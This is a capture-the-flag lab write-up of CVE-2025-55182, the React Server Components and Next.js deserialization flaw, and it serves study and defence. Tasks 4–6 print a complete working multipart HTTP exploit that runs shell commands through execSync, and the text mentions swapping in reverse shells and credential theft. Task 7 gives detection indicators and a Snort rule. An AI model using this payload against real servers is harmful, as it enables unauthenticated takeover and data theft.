## https://sploitus.com/exploit?id=0C5E1166-65F6-5683-BF77-88496F4CF365
# ๐ฏ React2Shell (CVE-2025-55182) โ From React Server Components to Full RCE
**Lab:** [https://tryhackme.com/room/react2shellcve202555182](https://tryhackme.com/room/react2shellcve202555182)
**Difficulty:** Intermediate โ Advanced
**Category:** Web Exploitation | Deserialization | RCE

---
## ๐งฉ Task 1: Introduction โ Why React2Shell Is a Big Deal
CVE-2025-55182, nicknamed **React2Shell**, is one of those vulnerabilities that instantly makes defenders nervous ๐ฌ. Discovered in **December 2025**, it carries a **CVSS score of 10.0**, which already tells you this isnโt some edge-case bug.
At its core, this vulnerability affects **React Server Components (RSC)** and frameworks built on top of them โ most notably **Next.js**. The scary part?
๐ **Unauthenticated Remote Code Execution (RCE)**
๐ **Single crafted HTTP request**
๐ **Default configurations are vulnerable**
No login. No special permissions. Just one well-formed request.
### ๐ฅ Affected React packages
* `react-server-dom-webpack`
* `react-server-dom-parcel`
* `react-server-dom-turbopack`
### โ Fixed versions
* **19.0.1**
* **19.1.2**
* **19.2.1**
This room walks us through *why* this bug exists, *how* it is exploited, and *what* defenders can do about it.
**Flag:** No answer needed.
---
## ๐ง Task 2: React Server Components & the Flight Protocol
Before exploitation, we need architecture clarity.
### What are React Server Components?
React Server Components (introduced in **React 19**) allow parts of a React app to run **on the server**, not the browser. This means:
* Heavy computation stays server-side โ๏ธ
* Client receives only rendered output ๐ฆ
* Better performance, smaller bundles
### Enter: React Flight โ๏ธ
Communication between client and server happens via the **React Flight protocol**. This protocol serializes data on the client and deserializes it on the server.
It uses **special markers**:
* `$@` โ Chunk reference
* `$B` โ **Blob reference**
* Property paths via colon notation
Example:
```
$1:constructor:constructor
```
โ ๏ธ And this serialization logic is exactly where things go wrong.
**Question:** What symbol denotes a Blob reference?
โ **Answer:** `$B`
---
## ๐ฃ Task 3: The Core Vulnerability โ Unsafe Deserialization
At the heart of CVE-2025-55182 lies a **classic unsafe deserialization flaw**.
Letโs look at the vulnerable pattern (do not crop ๐):
```js
function requireModule(metadata) {
var moduleExports = __webpack_require__(metadata[0]);
// ... additional logic ...
return moduleExports[metadata[2]]; // VULNERABLE LINE
}
```
### Why is this dangerous?
In JavaScript, bracket notation:
```js
obj[someKey]
```
does **not** limit access to exported properties only. It walks the **entire prototype chain**.
Now comes the critical insight ๐:
* Every JavaScript function has a `.constructor`
* `constructor` points to the **Function constructor**
* `Function("code")` = arbitrary JS execution
### Weaponizing Flight references
Because the Flight protocol allows colon-separated paths, an attacker can send:
```
$1:constructor:constructor
```
Which resolves to:
1. Get module chunk
2. Access `.constructor`
3. Access `.constructor` again โ **Function**
At this point, game over ๐ฎ.
**Flag:** No answer needed.
---
## ๐งจ Task 4: Exploitation Chain โ From Bug to RCE
Now letโs break down **maple3142โs PoC**, step by step.
### ๐งฉ Stage 1: Fake Chunk Object
The attacker sends a multipart request containing a **fake Chunk object**:
```json
{
"then": "$1:__proto__:then",
"status": "resolved_model",
"reason": -1,
"value": "{\\"then\\":\\"$B1337\\"}",
"_response": {
"_prefix": "process.mainModule.require('child_process').execSync('xcalc');",
"_chunks": "$Q2",
"_formData": {
"get": "$1:constructor:constructor"
}
}
}
```
This object **mimics Reactโs internal Chunk structure**.
By pointing `then` to `Chunk.prototype.then`, React is tricked into **awaiting attacker-controlled logic**.
---
### ๐งฉ Stage 2: Blob Handler Abuse
The `$B1337` marker triggers the **Blob deserialization handler**, which internally executes:
```js
response._formData.get(response._prefix + id)
```
But we poisoned:
* `_formData.get` โ `Function`
* `_prefix` โ malicious JS
Resulting execution:
```js
Function("process.mainModule.require('child_process').execSync('xcalc');1337")
```
๐ฅ Arbitrary JavaScript execution achieved.
---
### ๐งฉ Stage 3: OS Command Execution
The PoC executes:
```js
process.mainModule
.require('child_process')
.execSync('xcalc')
```
This can be trivially replaced with:
* Reverse shells
* Secret exfiltration
* File reads
* Cloud credential theft โ ๏ธ
**Flag:** No answer needed.
---
## ๐ฆ Task 5: Full HTTP PoC Breakdown
Hereโs the **complete exploit request** (verbatim, not cropped):
```
POST / HTTP/1.1
Host: localhost
Next-Action: x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="0"
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\\"then\\":\\"$B1337\\"}","_response":{"_prefix":"process.mainModule.require('child_process').execSync('xcalc');","_chunks":"$Q2","_formData":{"get":"$1:constructor:constructor"}}}
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="1"
"$@0"
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="2"
[]
------WebKitFormBoundaryx8jO2oVc6SWP3Sad--
```
(โฆmultipart body continuesโฆ)
### Key things to notice ๐
* `Next-Action` header triggers Server Actions
* `multipart/form-data` is mandatory
* `$@0` creates a self-reference
* `$B1337` triggers Blob logic
* `constructor:constructor` leads to `Function`
This is not accidental โ itโs a **precisely engineered chain**.
---
### ๐ Affected Ecosystem
* **React:** 19.0.0, 19.1.0, 19.1.1, 19.2.0
* **Next.js:**
* โฅ14.3.0-canary.77
* All 15.x
* Early 16.x
* **Others:** React Router (RSC), Waku, Redwood SDK
๐ Wiz research: **39% of cloud environments** exposed
๐ Shodan: **571k+ React servers**, **444k+ Next.js**
Thatโsโฆ a lot ๐ถ
---
## ๐งช Task 6: Exploitation in the Lab
First in Repeater, make New HTTP Request and select Target.

Using **Burp Suite Repeater**, we send the payload:
```js
execSync('id')
```

And later:
```js
execSync('whoami')
```

### โ Results
* **User:** `ubuntu`
* **Flag:**
```
THM{React-19.2.0}
```
Clean, reliable, repeatable exploitation ๐
---
## ๐ก๏ธ Task 7: Detection & Defense
Good news for defenders ๐ฎโโ๏ธ โ exploitation leaves fingerprints.
### ๐ Indicators of Attack
* `Next-Action` header
* `multipart/form-data`
* `"status":"resolved_model"`
* `"then":"$1:__proto__:then"`
These **should never appear** in normal user traffic.
---
### ๐จ Snort Rule (v3)
```snort
alert http any any -> $LAN_NETWORK any (
msg:"Potential Next.js React2Shell / CVE-2025-66478 attempt";
flow:to_server,established;
content:"Next-Action"; http_header; nocase;
content:"multipart/form-data"; http_header; nocase;
pcre:"/Content-Disposition:\s*form-data;\s*name=\"0\"/s";
pcre:"/\"status\"\s*:\s*\"resolved_model\"/s";
pcre:"/\"then\"\s*:\s*\"\$1:__proto__:then\"/s";
classtype:web-application-attack;
sid:6655001;
rev:1;
)
```
---
### ๐งพ OSQuery โ Finding Vulnerable Packages
```json
{
"queries": {
"detect_rev2shell_react_server_components": {
"query": "SELECT name, version, path FROM npm_packages WHERE ...",
"interval": 3600
}
}
}
```
Perfect for:
* CI/CD pipelines
* Endpoint audits
* Pre-production checks

---
## ๐ง Final Thoughts
React2Shell is a **textbook example** of:
* Why unsafe deserialization is deadly
* How prototype chains can betray you
* Why โdefault configsโ are dangerous
Once patched versions are installed and `npm audit` recommendations followed, **the exploit dies completely** โ .
โ ๏ธ Never test this outside authorized labs.
๐ฅ Always patch fast.
๐ง Always understand *why* a bug exists โ not just how to exploit it.
---
### โญ Follow Me & Connect
If you enjoyed this write-up or want to stay connected with my work in cybersecurity, CTFs, and VAPT:
๐ **GitHub:** [https://github.com/AdityaBhatt3010](https://github.com/AdityaBhatt3010)
๐ผ **LinkedIn:** [https://www.linkedin.com/in/adityabhatt3010/](https://www.linkedin.com/in/adityabhatt3010/)
โ๏ธ **Medium:** [https://medium.com/@adityabhatt3010](https://medium.com/@adityabhatt3010)
Happy hacking โ responsibly ๐ฟ๐
---